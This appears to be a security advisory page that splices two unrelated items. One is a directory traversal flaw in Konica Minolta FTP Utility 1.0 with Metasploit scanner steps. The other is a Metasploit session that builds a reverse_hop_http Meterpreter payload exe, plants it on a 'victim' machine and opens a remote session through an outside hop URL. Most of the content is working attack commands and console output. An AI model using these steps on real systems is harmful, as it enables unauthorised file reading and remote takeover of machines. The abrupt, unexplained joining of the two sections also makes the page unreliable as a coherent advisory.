Konica Minolta FTP Utility 1.0 - Directory Traversal Vulnerability

Overview

Directory traversal vulnerability in Konica Minolta FTP Utility 1.0 allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in a RETR command.

Vulnerable software and versions

+ Configuration 1
+ OR
* cpe:/a:konicaminolta:ftp_utility:1.0

* Denotes Vulnerable Software
Changes related to vulnerability configurations  

 

 

Proof of concept :  

step 1. use auxiliary/scanner/ftp/konica_ftp_traversal

step2. set rhosts  victim IP 

step3. set verbose TRUE 

step4. run 

 

 

HTTPS support in both shellcode and handler

The reverse_hop_http module to now work with https 

Verification Steps 

 

  1.   place the /data/php/hop.php script on a server with PHP support. 

  2.   load the payload set the HOPURL appropriately, generate an exe . 

  3.   store the exe on the "victim" machine. 

  4.   use the exploit/multi/handler with the reverse_hop_https payload. 

  5.   execute the hop payload exe on the "victim" machine.  

Proof of concept :  

msf > use payload/windows/meterpreter/reverse_hop_http 

 msf payload(reverse_hop_http) > set HOPURL https://192.168.1.23/h.php
HOPURL => https://192.168.1.23/h.php 

 msf payload(reverse_hop_http) > generate -t exe -f hop.exe
[*] Writing 73802 bytes to hop.exe... 

msf payload(reverse_hop_http) > use exploit/multi/handler 

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_hop_http
PAYLOAD => windows/meterpreter/reverse_hop_http 

msf exploit(handler) > set HOPURL https://192.168.1.23/h.php
HOPURL => https://192.168.1.23/h.php 

msf exploit(handler) > exploit 

[*] Preparing stage for next session nLxTeqmU1V-UCZQJwk2TvwB3XGe40qBOgvZVHPCyOP9IrUFsrEy4xPJZIZ6ttMrGqpZbacU
[*] Starting the payload handler...
[*] Uploaded stage to hop https://192.168.1.23/h.php?/
[*] Meterpreter session 1 opened (Hop client -> scriptjunkie.us:443) at 2015-11-11 21:30:16 -0600
[*] Preparing stage for next session uAHZHR2pS-ENdw13WzMKvwPcR5sR_-ibOWyFdmZ7sYp5SDRAauDRJtANqI9zUJFU47bQHK7Bmw